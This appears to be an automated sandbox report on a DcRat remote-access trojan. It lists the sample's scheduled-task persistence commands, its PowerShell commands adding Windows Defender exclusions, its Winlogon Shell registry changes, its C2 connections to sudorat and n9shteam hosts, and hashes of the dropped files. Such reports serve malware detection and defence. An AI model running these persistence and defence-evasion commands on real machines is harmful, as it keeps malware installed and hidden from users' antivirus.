schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 10 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 5 /tr "'C:\Program Files\Java\jre7\lib\dwm.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files\Java\jre7\lib\dwm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Program Files\Java\jre7\lib\dwm.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\conhost.exe.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\MSBuild.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\sppsvc.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Photo Viewer\audiodg.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\sppsvc.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Favorites\lsass.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\winlogon.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\wininit.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\lsm.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\lsass.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\taskhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\de-DE\conhost.exe.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\security\templates\audiodg.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\audiodg.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Java\jre7\lib\dwm.exe'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Cs9AbqBBxW.bat"
C:\Users\Public\Documents\containerRuntime.exe
"C:\Users\Public\Documents\containerRuntime.exe"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\sppsvc.exe
"C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\sppsvc.exe"
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 25350.client.sudorat.top | udp |
| RU | 185.37.62.158:25350 | 25350.client.sudorat.top | tcp |
| N/A | 127.0.0.1:1111 | tcp | |
| US | 8.8.8.8:53 | 25350.client.sudorat.ru | udp |
| US | 8.8.8.8:53 | 117813cm.n9shteam.in | udp |
| FR | 37.44.238.250:80 | 117813cm.n9shteam.in | tcp |
| RU | 31.44.184.52:25350 | tcp | |
| US | 8.8.8.8:53 | 729231cm.n9shteam1.top | udp |
| FR | 37.44.238.250:80 | 729231cm.n9shteam1.top | tcp |
| RU | 185.37.62.158:25350 | 25350.client.sudorat.top | tcp |
| RU | 31.44.184.52:25350 | tcp | |
| RU | 185.37.62.158:25350 | 25350.client.sudorat.top | tcp |
| RU | 31.44.184.52:25350 | tcp | |
| RU | 185.37.62.158:25350 | 25350.client.sudorat.top | tcp |
| RU | 31.44.184.52:25350 | tcp | |
| RU | 185.37.62.158:25350 | tcp |
Files
\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe
| MD5 | 10e817a4d5e216279a8de8ed71c91044 |
| SHA1 | 97c6fb42791be24d12bd74819ef67fa8f3d21724 |
| SHA256 | c60f74f6e164049e683a5f01b8cfea24aa85cbf6c7b31b765cbad16d8ab0d7b2 |
| SHA512 | 34421a517f5f1909afd694d24e22cafad9930725df964ba9c80666e9f0f2dcfdd2a254dcf6699e5797296ec3ae611593563779df05e3a617c7f8679a154dfd37 |
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe
| MD5 | a05e26d89c5be7e2c6408b09cd05cf74 |
| SHA1 | c24231c6301f499b35441615b63db6969a1762fd |
| SHA256 | 05628dfff22e15b219a711cf52a2c87521170853979f00fcd014cf164656418e |
| SHA512 | 8c8733f12dd71cfafd2edbfad487279d6ed971eb119b1cde92a905f4658a9b090f831f42ef2228a4f6c64071a1f54fb74708438b4361e317e36016897577913d |
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe
| MD5 | bc7804fca6dd09b4f16e86d80b8d28fa |
| SHA1 | a04800b90db1f435dd1ac723c054b14d6dd16c8a |
| SHA256 | 1628864ab0bafe8afea2ad70956b653550dab3db7c4cdf6f405e93a6c2441dce |
| SHA512 | 7534ac0a215f02af85bdf2b414e23face0570943f8820e7bfe97ea274ccd1a01618556e93b7465c2d9fbb0bcde5e97fab9e9b6bddd366554277ef308cde3a83c |
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe
| MD5 | e8c32cc88db9fef57fd9e2bb6d20f70b |
| SHA1 | e732b91cd8ac16fa4ce8ad9e639bf21d69f6bb45 |
| SHA256 | f787ce198538b1c0b2bfce8ce5297e34152cf6deebe559df6887f65c72a081a4 |
| SHA512 | 077307d42438f2b72d62ce9e35c67c09e1375c2e203e6d6d455c6c8861c6442b3d82f1345b6c76940f5e8015fe93491158a59b102fabd139c742d75c2c42ba7a |
memory/1684-47-0x0000000004620000-0x0000000005014000-memory.dmp
memory/2616-48-0x0000000000400000-0x0000000000DF4000-memory.dmp
memory/2836-58-0x0000000001210000-0x000000000150E000-memory.dmp
C:\Users\Admin\AppData\Roaming\chainReviewdhcp\mJEJ7PbY35CMaAu5227dvHv.vbe
| MD5 | d47062c8738a534fc931c0f341a61773 |
| SHA1 | c1175037a0e96363da56bc9d8abdb726cddc74fc |
| SHA256 | 484cc22b88e1eaae619f948e96812ebf70275f9e6408e2e3dbd8af827ac5199a |
| SHA512 | 9de6dcf7944ec9f2ff44c8fdbe562a6755c2af9800028b01fb0969921e6ef969c1ecc6e2ab129f191ac5feeaa9aa30cf436489dfee8e94433d6678a9942ffe39 |
memory/2616-60-0x0000000000400000-0x0000000000DF4000-memory.dmp
memory/2836-61-0x00000000005F0000-0x00000000005FE000-memory.dmp
memory/2836-62-0x0000000000A00000-0x0000000000A5C000-memory.dmp
memory/2836-63-0x0000000000AE0000-0x0000000000AF2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe.config
| MD5 | a2b76cea3a59fa9af5ea21ff68139c98 |
| SHA1 | 35d76475e6a54c168f536e30206578babff58274 |
| SHA256 | f99ef5bf79a7c43701877f0bb0b890591885bb0a3d605762647cc8ffbf10c839 |
| SHA512 | b52608b45153c489419228864ecbcb92be24c644d470818dfe15f8c7e661a7bcd034ea13ef401f2b84ad5c29a41c9b4c7d161cc33ae3ef71659bc2bca1a8c4ad |
memory/1776-74-0x00000000013C0000-0x00000000016BE000-memory.dmp
memory/1776-75-0x0000000000C20000-0x0000000000C6E000-memory.dmp
memory/644-85-0x0000000000400000-0x00000000006FE000-memory.dmp
memory/644-84-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/644-86-0x0000000000400000-0x00000000006FE000-memory.dmp
memory/644-88-0x0000000000400000-0x00000000006FE000-memory.dmp
memory/644-82-0x0000000000400000-0x00000000006FE000-memory.dmp
memory/644-80-0x0000000000400000-0x00000000006FE000-memory.dmp
memory/644-78-0x0000000000400000-0x00000000006FE000-memory.dmp
memory/644-76-0x0000000000400000-0x00000000006FE000-memory.dmp
memory/644-90-0x0000000000DE0000-0x0000000000DF8000-memory.dmp
memory/644-91-0x0000000002390000-0x00000000023A0000-memory.dmp
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\DaJttDh54LCmoatNZvevDoWyEmexKWgun1WAXP2cdZM0egnWJQQpZtVxW.bat
| MD5 | fbef3b76368e503dca520965bb79565f |
| SHA1 | 9a1a27526b8b9bdaae81c5301cd23eb613ea62ba |
| SHA256 | bcb2af67a4ea1e6aa341cf3141941dbe7b17f1911e7f20aba46552571f99c9f3 |
| SHA512 | 2b99bc9a945b6d9a2c0d3206dce9221eb7f4a2040c5096909d60c3278254c52b39a28dd18dd4e005eff0ebd7e7cba6dd3a6a94ea8a7d7598da3001da174db3f5 |
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
| MD5 | 00c4245522082b7f87721f9a26e96ba4 |
| SHA1 | 993a8aa88436b6c62b74bb399c09b8d45d9fb85b |
| SHA256 | a728f531427d89c5b7691f989e886df57d46f90d934448e6dabf29d64d0662bf |
| SHA512 | fdd8d2444b28883face793f6ea77913c2096a425e6101202536ea001c3df5e76a60a01673ee7a52eae827a12299b2727002895395315db190ec82ae11a68559f |
memory/2248-97-0x0000000001180000-0x0000000001188000-memory.dmp
memory/2248-98-0x000000001AB90000-0x000000001AC94000-memory.dmp
C:\Users\Admin\AppData\Roaming\chainReviewdhcp\LJrjU6BhAd6hMsY1uw5hl2I0p3Jh.bat
| MD5 | 2fa8decc3dafe6f196f6c28769192e7c |
| SHA1 | 69f4e0cf41b927634a38b77a8816ca58c0bfb2de |
| SHA256 | 7e40eb542d164397c0bf17a47c8f0db79e7028299e9f180d38505220fd2cfb30 |
| SHA512 | c9fb6c2ac2441ff14673ccaa3f1d5e703356c093353992d302d34df6c9e26a85aba6760c3b98f0cd0ada45183c55b2e5cabc09978ca084077dd71743ca9fdbc1 |
\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
| MD5 | 52c95032ff8b8c3d4dfd98e51d8f6f58 |
| SHA1 | e841a32cb07adaad4db35b1f87b5df6e019eb9af |
| SHA256 | 39b35293e7efaa4cb94028e59872013bef4065788fef9fe3cd3206a8aee711e4 |
| SHA512 | a1177740ffbb476fb11f8112d98cabe3012ee3d54f2f848bb22ea99b53bd3526bf59065951fb6ef29f29408ab2fd90c942de65fe16d66a098abce8ba5d7d4e00 |
memory/1960-104-0x0000000001170000-0x00000000012CA000-memory.dmp
memory/2248-106-0x0000000000AB0000-0x0000000000ABE000-memory.dmp
memory/2248-108-0x0000000000AE0000-0x0000000000AFC000-memory.dmp
memory/1960-109-0x00000000002C0000-0x00000000002DC000-memory.dmp
memory/1960-112-0x0000000000300000-0x0000000000316000-memory.dmp
memory/2248-111-0x0000000000C90000-0x0000000000CA8000-memory.dmp
memory/1960-113-0x00000000002E0000-0x00000000002F0000-memory.dmp
memory/2248-115-0x0000000000AC0000-0x0000000000ACE000-memory.dmp
memory/2248-117-0x0000000000AD0000-0x0000000000ADC000-memory.dmp
memory/2248-119-0x0000000000CB0000-0x0000000000CBE000-memory.dmp
memory/2248-121-0x0000000000CC0000-0x0000000000CCC000-memory.dmp
memory/2248-123-0x0000000000CD0000-0x0000000000CDC000-memory.dmp
memory/2248-125-0x0000000000CE0000-0x0000000000CEE000-memory.dmp
memory/2248-127-0x0000000000CF0000-0x0000000000CFC000-memory.dmp
memory/1960-128-0x0000000000790000-0x000000000079E000-memory.dmp
memory/1960-129-0x00000000007A0000-0x00000000007AC000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | dc98ca6ba78dd79031b468b4810e38dc |
| SHA1 | bf220e9ea3ea7a1d3f56b3b9169aded481a9f5c0 |
| SHA256 | c9cb635c1deef0897eb9b3ef25bdf3df7ccce08b1a7001e389014779cae05f03 |
| SHA512 | 1bb0b4414b9c7737dd94bac9ca602ad4221d00e66db2b2d6baf41b6282f317805fcc356f02bc37be5fab49787fdd90d1c1fd5211ef1dd58376ff157692c207c9 |
memory/2380-163-0x000000001B7C0000-0x000000001BAA2000-memory.dmp
memory/2184-164-0x00000000022C0000-0x00000000022C8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ioi08Taqru.bat
| MD5 | 1136ecc0a95a58dfd27f6f032f11ebad |
| SHA1 | 73f44996f101096ccdb8ec1a075eaf3833ffc406 |
| SHA256 | 8e9aed3bc0a39c8a1ad1f118169d5b11c132c1e9d4ba1c5869f14738b88770ba |
| SHA512 | 9dea9cc4bbd082655406c02283eccd79d3b2fae27d80cb0d95359e94ecf75d9b2ca85f96d903678b1bcbbba6be9482633ba828f972ec1515df765dcdbd4ae6e0 |
\??\c:\Users\Admin\AppData\Local\Temp\gxqun3yq\gxqun3yq.cmdline
| MD5 | cd3788eb7c2c86243f992312c67107b3 |
| SHA1 | 9178ef7a189f35170d73c92dab567b61d360e9e2 |
| SHA256 | 972cecaaac083d67b19fd297bf2128f4e78ba9aa76e2a76e11be2b434da8deba |
| SHA512 | daeaf512a6fb3142edb623f50b8e16a65371f3e08e3f044740df39f604303d08ed5c3cc9e2d9b2de163e9ee7ddb09dc00050e67697084b624ca874492a43ee73 |
\??\c:\Users\Admin\AppData\Local\Temp\gxqun3yq\gxqun3yq.0.cs
| MD5 | b44da4c0f825b7f761030505c6da6b66 |
| SHA1 | 28b66051b40e3984435176efec7937fa759f3cd2 |
| SHA256 | 9dc450cf1df0857e9dd71d3f2b40c34406b1c105fa7249f6348ebb0a3541c9d2 |
| SHA512 | 6e15eb38d5af1c5db5bedb2d237325bd2ea02cf27425b94756855cc87e35dd4e58aca7c58f9b5270d214bed93e4d97e6eec26b8f52f2825533fb42420bfb4a7a |
\??\c:\Program Files\Windows Photo Viewer\en-US\CSC26E9B39D213245928B931B4D3D3897.TMP
| MD5 | 169bc6dc73ba66baacdb4d2a953f6ba6 |
| SHA1 | 539f14f124f21548bff9e0c4af763cd54fa1527d |
| SHA256 | bfc43c31534d80937c6af4f8db9a5e05c2982a7db57460cda32d95493f83d5e3 |
| SHA512 | 12b3a50df4d7bd16325af7d1e8cf2d4ed29cb6426538550168806b8bb73755f93f1622e60157efb3873ecc70bb1d9dc2e6ad276e7eed4a794af46f50089c969d |
C:\Users\Admin\AppData\Local\Temp\RES736B.tmp
| MD5 | 22c23a8104bfd0a9797b6a1c39c243ff |
| SHA1 | 6c839ded71ccbf4d1915696e6ac50d4d1e5f31ab |
| SHA256 | addb6332e532fc6f45d89588fbf3a2e9f67dd7bcaed1cd62b05b1c1885792177 |
| SHA512 | e3b442d4c30e93631b373d21c9f66b37b03fbf67c9bbdb19cef88fae858e120e1c174ed89cd8aa7a451e61eb4e04ed646f6371af456ca4d7d91dc4f844390b6b |
\??\c:\Users\Admin\AppData\Local\Temp\vyynnwny\vyynnwny.0.cs
| MD5 | 54dcbd4cddc517ecf37e0738b96eb246 |
| SHA1 | a4ec223c69bc253b988d8ec4b8c928befa0d2009 |
| SHA256 | cc72bbe28417b4950c994ac979c5073ea0ef7cb35f586519b26181bc0115a806 |
| SHA512 | 06a5dcb095311d1ae84ab764d5ec6f10ce1f99dbbcebdb8fa0f6de3dd41be15a281755a147dbb69843ca7575bb100ba2d7851070410667e0a4c4c837c32110ec |
\??\c:\Users\Admin\AppData\Local\Temp\vyynnwny\vyynnwny.cmdline
| MD5 | b40aa1c5723fa72cb06ab486fa83ab33 |
| SHA1 | ee3b6ccbbd01cfcee0a7d63c6dd886ed4c5fe106 |
| SHA256 | b77cddb52ce374967212c3daea38254c412c4d51581c8b77a9ccfc9b0bcfc5c6 |
| SHA512 | 83d1ce6faec96c30056790d520f6d2ee1dd598bdcf5ef0dbc81b1e06582422b3de15c0ae051bc57579b70b562dad1a651f077a62b9e4508eb77b784f17d86969 |
C:\Users\Admin\AppData\Local\Temp\RES7417.tmp
| MD5 | 30db2e0ee295e54b76f28c0d43c32b9d |
| SHA1 | 116c80fdae2985c43dffc82bbcac38663e0e3be8 |
| SHA256 | cfee47f43e2830c3598f2677ff476f90db6a5a67658811e624f45a7ab79170ad |
| SHA512 | 47e96cb332907b095fb2495d5d1d1db357a6e585b8f32a128ba519dc83108206357891d98aa37027df7ff1760b932cacd43064f0e86743d8098d242db0371f67 |
\??\c:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\CSCC87458AC71914A5D9817B7C12DDC47EA.TMP
| MD5 | beb071b378f7255ac19ff7e7e3135f6e |
| SHA1 | a09191db7295117df513f121d892c08f11b46eaa |
| SHA256 | a5c200a254b1c109dca75f477188c7fc29a2876874ea4aadfd5df94903f39e7f |
| SHA512 | 5bb54a1fb6f68f147c4a9fc170f8ae12cc5e94d2fcfe241bf262a771af4c0e8352dc1bcb9157c63696dc2a2407d15c5ef14d0213ac79b44b4092128924747a82 |
\??\c:\Users\Admin\AppData\Local\Temp\1gnpojgr\1gnpojgr.cmdline
| MD5 | 39e12c261d8c72139db68570730a10b8 |
| SHA1 | 2fae6b6609ef6e9974e6e2c47d7bdb6f003ef80b |
| SHA256 | d6a318a2cee117d658e844ca31f71c84e4dd50535cfd1513580ad0eb84c90958 |
| SHA512 | bee89d89e7f37d0a3f22f4f625faa23eaa018879a5c4e9058c48dc6087ac8c53a35fbcda24a1437c6c950736dd22886b908f1fb7203e477edeffbda605e1e6b1 |
\??\c:\Users\Admin\AppData\Local\Temp\1gnpojgr\1gnpojgr.0.cs
| MD5 | 85f873c32493eb4186341a57c58191d7 |
| SHA1 | a5b931237f2c21cf2c62a8990fdb7a49e10a1617 |
| SHA256 | b31e812da734042bc2326b9bd76927d4d74162adfd4983f66e0d606050aab5f2 |
| SHA512 | 2590fc305befbc9e416dd6ed2f01d749c9155f6ffd44c9095d8f6565f5c9583ec99c923ac2ac0a81e462709122e36d43a7bee0354ba08caba5d853d569048eed |
\??\c:\Windows\System32\CSC8AF8654FC13D48D0A5FAAA4B8D729FE.TMP
| MD5 | 8c85ef91c6071d33745325a8fa351c3e |
| SHA1 | e3311ceef28823eec99699cc35be27c94eca52d2 |
| SHA256 | 8db3e3a5515da1933036688a9b1918cfc3339fc687008c5325461271904b2d41 |
| SHA512 | 2bb89b07fe46b1c406ed6a560e88cb2b8402b1d61bb71e10887bad661751f64f1e5317fd6c1b301ea4766785b915da31b64e0475cfe36c1f950b32915b5dab7d |
C:\Users\Admin\AppData\Local\Temp\RES7494.tmp
| MD5 | 98cdb9ff1adfd1ea456cef86b0337bc7 |
| SHA1 | 7675b90f1ec5a2d5ea1ae2484a55f0fb316f5b3d |
| SHA256 | 9ebe5c5bc368f14caa5a3d72f024ce4f55a6b50346a115ec91d71864e7f2738f |
| SHA512 | 606d7c1bce8dd4c710fa680ff2307eeff07f4c8a0d895d2a754c3fc95112de4287a04d1dbf015347bedef517c0687fefdf7505258bada5f741d2f8f11d73ff39 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 41aeb53342ad5483bee1456b152ba0a3 |
| SHA1 | 133d14548698cd00caa892608ff527191c0092cf |
| SHA256 | 3a65dcedb6a184e0c22e45359b513b76ee0165c83e8db574220fc88cc342b7d6 |
| SHA512 | b73a28a19f904ac0066b8fa9a41473c99d51d985c6e7cbc2c919aea31467b722ae0ceaed73a0caead9e35497627c3045b21ce7d85e4a89e5a4dd28924ebdcc18 |
memory/1552-218-0x000000001B4C0000-0x000000001B7A2000-memory.dmp
memory/1552-220-0x0000000002180000-0x0000000002188000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MErU4jTVhT.bat
| MD5 | 48bd5ce29bcc06b7a9277d27483ac2a2 |
| SHA1 | 1f4706bbd7b583db0da605ceb72c7cca973ca0b4 |
| SHA256 | 0982f42e22fd38096c43af177b73066155e02d49fff1b483d04dec0bc0eca60a |
| SHA512 | c9128e042253404c29c74125342b6e6e9272847df23e37e65e5d6921dea352ad4168f224e30b2e0944806f6f943fc9cd06ae61cd92dc87306cbb127810eab4cf |
memory/2828-244-0x00000000013A0000-0x00000000013A8000-memory.dmp
C:\Program Files\Windows Photo Viewer\en-US\conhost.exe
| MD5 | 99f99dbcac6ebfe7231243248eb4c34f |
| SHA1 | 20f998db1d91e6ee20814e803554627d739d8f83 |
| SHA256 | 6fcd69e020f0dabc08164a755454aa5ba19f5f5ca1ac91d40f182909d47ef3c9 |
| SHA512 | d43baaa22b625d0ddbdeb2fd2088811b2588d9e494234374c69b377ea73946ace9d51cf355881b6d503dc2d0c4d56e8a6538149e43ce096a9f417c4a2bbb9bcc |
memory/1776-249-0x0000000000140000-0x000000000029A000-memory.dmp
memory/2512-248-0x0000000000970000-0x0000000000978000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2264-308-0x0000000001DE0000-0x0000000001DE8000-memory.dmp
memory/3280-378-0x0000000000A70000-0x0000000000A78000-memory.dmp
memory/3640-379-0x0000000000A60000-0x0000000000BBA000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2025-01-13 12:34
Reported
2025-01-13 12:36
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
146s
Command Line
Signatures
DcRat
Dcrat family
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Windows\\security\\conhost.exe\", \"C:\\Windows\\uk-UA\\fontdrvhost.exe\", \"C:\\Program Files\\Google\\Chrome\\Application\\sppsvc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\sihost.exe\", \"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\", \"C:\\Users\\Default User\\RuntimeBroker.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\92.0.902.67\\OfficeClickToRun.exe\", \"C:\\Program Files\\Windows Security\\cmd.exe\", \"C:\\Program Files (x86)\\Windows Mail\\MpDefenderCoreProtion.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\cmd.exe\", \"C:\\Program Files\\Internet Explorer\\SIGNUP\\dllhost.exe\", \"C:\\Recovery\\WindowsRE\\runtimesvc.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Windows\\security\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Windows\\security\\conhost.exe\", \"C:\\Windows\\uk-UA\\fontdrvhost.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Windows\\security\\conhost.exe\", \"C:\\Windows\\uk-UA\\fontdrvhost.exe\", \"C:\\Program Files\\Google\\Chrome\\Application\\sppsvc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\sihost.exe\", \"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\", \"C:\\Users\\Default User\\RuntimeBroker.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\92.0.902.67\\OfficeClickToRun.exe\", \"C:\\Program Files\\Windows Security\\cmd.exe\", \"C:\\Program Files (x86)\\Windows Mail\\MpDefenderCoreProtion.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\cmd.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Windows\\security\\conhost.exe\", \"C:\\Windows\\uk-UA\\fontdrvhost.exe\", \"C:\\Program Files\\Google\\Chrome\\Application\\sppsvc.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
